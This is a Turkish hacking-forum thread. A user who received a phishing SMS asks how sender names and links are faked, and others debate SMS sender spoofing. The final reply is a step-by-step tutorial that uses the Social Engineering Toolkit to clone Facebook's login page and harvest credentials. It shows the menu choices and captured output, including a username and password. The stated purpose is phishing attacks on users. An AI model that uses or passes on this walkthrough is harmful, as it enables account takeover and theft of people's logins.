Sosyal Mühendislik Linkleri Nasıl Oluşturuluyor?

SenotS

Yeni üye
19 Eyl 2021
10
0
21
agalar bana geçen fake sms geldi farkettim indirmedimde aklıma takıldı sorularımı soruyorum:
1) s.m. ile sosyal medya hesabı çalmaya çalışıyorlar ya fake sms attıklarında normalde insta sms gönderdiğinde INSTAGRAM yazar gönderende fake sms ile attıklarında gönderende kimin adı yazıyor yazarlarsa nasıl INSTAGRAM yazıyor
2) mesela bir link attılar çalmak için yazan link mesela http//dasdasdasdas.1321 yazıyo bunu nasıl www.facebook/twitter yapıyorlar

(çok soru sordum rahatsız ettiysem kb'yın)
 

'Türk

Moderasyon Ekibi Direktör Yard.
5 May 2020
2,295
1,291
K E R K Ü K
Merhaba link olayına cevap vereceğim, bire bir aynısı değil ancak çok benzeri bir linke çevirmekte.
birnevi link gizleme olarakta değerlendirilebilir.
konuma göz atabilirsiniz
 

'Laymen

Katılımcı Üye
11 Tem 2021
596
397
Black Earth
agalar bana geçen fake sms geldi farkettim indirmedimde aklıma takıldı sorularımı soruyorum:
1) s.m. ile sosyal medya hesabı çalmaya çalışıyorlar ya fake sms attıklarında normalde insta sms gönderdiğinde INSTAGRAM yazar gönderende fake sms ile attıklarında gönderende kimin adı yazıyor yazarlarsa nasıl INSTAGRAM yazıyor
2) mesela bir link attılar çalmak için yazan link mesela http//dasdasdasdas.1321 yazıyo bunu nasıl www.facebook/twitter yapıyorlar

(çok soru sordum rahatsız ettiysem kb'yın)
 
Son düzenleme:
19 May 2020
238
84
Fake GSM'ler ile bu ad değiştirme yapıyorlar bunu nasılmı yapıyorlar
kullandıkları uygulamaya göre size sanki İnstegram'dan mesaj gelmiş gibi gösterip bunu kolaylıkla Yapabiliyorlar Tek İhtiyaç Fake Numara
böyle bir şey mümkün değil, sms göndermek için btk'dan kullandıkları santral için izin almaları gerekmekte. ayrıca şirketin resmi olarak vergi levhasında geçen adıyla kısaltılabilir bu sms başlıkları, şahıs şirketiyse isim soyisim yazar örneğin. varsa böyle bir uygulama bana bir örnek gösterir misin?
 

'Laymen

Katılımcı Üye
11 Tem 2021
596
397
Black Earth
böyle bir şey mümkün değil, sms göndermek için btk'dan kullandıkları santral için izin almaları gerekmekte. ayrıca şirketin resmi olarak vergi levhasında geçen adıyla kısaltılabilir bu sms başlıkları, şahıs şirketiyse isim soyisim yazar örneğin. varsa böyle bir uygulama bana bir örnek gösterir misin?
Senin dediğin doğru aslında amma velakin illegal bir şekilde yapılabilir bence
 
19 May 2020
238
84
Senin dediğin doğru aslında amma velakin illegal bir şekilde yapılabilir bence
bencesi yok bu işin, öyle varsayımla mantık yürütülecek bir konu değil bu. mail göndermiyorsun sen. bilgin olmadığı konularda bence yanlış bilgi verme insanlara. bunun en illegal yolu, bir hacker veya bir hacker grubunun bir telekomünikasyon şirketini hacklemeleri, daha sonrasında bu izin için sahte bir evrak oluşturup devletin resmi makamlarına onaylatmaları gerekmektedir. yok öyle INSTAGRAM başlığı oluşturabilecek "fake sms" uygulaması veya bir babayiğit hacker. en ılımlı "bencesi" (yani bilmediğim için ve olasılık dahilinde fikir yürüttüğüm için bencesi diyorum) bu işin, sms'in de mobil uygulamalar ile internet ağı ile iç içe geçtiği günümüzde, dns gibi gönderenin adını veya numarasını yeniden yazacak zararlı bir yazılım olabilir.
 

'Laymen

Katılımcı Üye
11 Tem 2021
596
397
Black Earth
böyle bir şey mümkün değil, sms göndermek için btk'dan kullandıkları santral için izin almaları gerekmekte. ayrıca şirketin resmi olarak vergi levhasında geçen adıyla kısaltılabilir bu sms başlıkları, şahıs şirketiyse isim soyisim yazar örneğin. varsa böyle bir uygulama bana bir örnek gösterir misin?
bencesi yok bu işin, öyle varsayımla mantık yürütülecek bir konu değil bu. mail göndermiyorsun sen. bilgin olmadığı konularda bence yanlış bilgi verme insanlara. bunun en illegal yolu, bir hacker veya bir hacker grubunun bir telekomünikasyon şirketini hacklemeleri, daha sonrasında bu izin için sahte bir evrak oluşturup devletin resmi makamlarına onaylatmaları gerekmektedir. yok öyle INSTAGRAM başlığı oluşturabilecek "fake sms" uygulaması veya bir babayiğit hacker. en ılımlı "bencesi" (yani bilmediğim için ve olasılık dahilinde fikir yürüttüğüm için bencesi diyorum) bu işin, sms'in de mobil uygulamalar ile internet ağı ile iç içe geçtiği günümüzde, dns gibi gönderenin adını veya numarasını yeniden yazacak zararlı bir yazılım olabilir.
Herneyse teşekkürler dostum sen yardımcı olursun
 

Krypthon

Katılımcı Üye
21 Ağu 2021
796
754
Tien-Şan
Merhaba öncelikle aynı domaini kullanarak bunu yapmanız çok zor ancak bir benzerini oluşturabilirsiniz hedefin o siteye giriş yapması için ikna kabiliyetinizi ve profesyonelliğinizi konuşturmanız gerekiyor

Site klonlamak için ise ;


Amaç:Kopyalanmış web sayfaları oluşturarak kullanıcıya yönelik oltalama saldırıları gerçekleştirme.

Kullanılan Araçlar:

  • SET(Social Engineering Toolkit)

1.Adım:Social Engineering Toolkit(SET) başlatalım.
root@root:~# cd /pentest/exploits/set
root@root:/pentest/exploits/set# ./set



_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/ \n

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.0.3 [---]
[---] Codename: 'Trebuchet Edition' [---]
[---] Report bugs to: [email protected] [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: NuWaveTec - HTML5 E-Commerce Template [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

Join us on irc.freenode.net in channel #setoolkit
2.Adım:Bu adımları aşağıdakiler gibi takip edin;
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

Join us on irc.freenode.net in channel #setoolkit

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set > 2


The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack > 3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack > 2

[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: Work at Home FAQ™Example
set:webattack > Enter the url to clone: (Sizler başka siteler ekleyebilirsiniz.Ör:https://accounts.google.com)

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]

Press {return} to continue.(Enter tuşuna basınız)
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Bu bölümde kurbanın oluşturduğumuz sahte adresimizi ziyaret etmesini bekliyoruz.Eğer adresimizi ziyaret eder ve login bilgilerini girerse kullanıcı adı ve parola ekrana yazdırılacaktır.

3.Adım:Şimdi oluşturduğumuz sahte adresi(http://172.16.244.128/) ziyaret edelim ve login olmaya çalışalım.

facebook login ekranı


4.Adım:Gerçekleşen login girişimlerini ekranda görebilirsiniz.
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVoZd6kS
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=-120
PARAM: lgnrnd=081425_7Wct
PARAM: lgnjs=1420734563
POSSIBLE USERNAME FIELD FOUND: email=etik.backtrack
POSSIBLE PASSWORD FIELD FOUND: pass=etikbacktrack1453@
Oluşturduğunuz sahte web sitesinin adresini öğrenmek için terminalde "ifconfig" komutunu yazdırabilirsiniz.

İyi Forumlar...
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.